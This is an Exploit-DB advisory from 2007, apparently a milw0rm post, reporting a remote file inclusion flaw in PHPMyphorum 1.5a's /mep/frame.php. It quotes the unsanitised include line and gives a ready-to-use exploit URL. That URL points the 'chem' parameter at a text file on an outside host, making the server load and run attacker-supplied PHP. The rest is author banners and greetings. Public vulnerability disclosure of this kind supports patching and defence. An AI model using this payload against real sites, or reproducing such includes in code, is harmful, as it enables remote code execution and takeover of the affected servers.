PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion

EDB-ID:

3145




Platform:

PHP

Date:

2007-01-17


#########################################################################  
#                                                                       #                                            
#           [ PHPMyphorum 1.5a ]                                        #                           
#                                                                       #                                            
# Class:     File Include Vulnerability                                 #      
# Published  2007/1/17                                                  #                              
# Remote:    Yes                                                        #                                      
# Critical   Level : Dangerous                                          #                                                   
# Site:      http://www.comscripts.com/scripts/php.phpmyphorum.1104.html#        
# Author:    TheViper-hacker                                            #
# Contact:   theviper-hacker@hotmail.com        			#                          
#                       						#
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include("$chem/session/cookie_sys_verif.php");
=======================================================
Exploit :        

Http:// www.Victem.0 / [Comment IT_path] /mep/frame.php?chem=http://turnkringonzehoop.be/viper.txt?
 

 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# milw0rm.com [2007-01-17]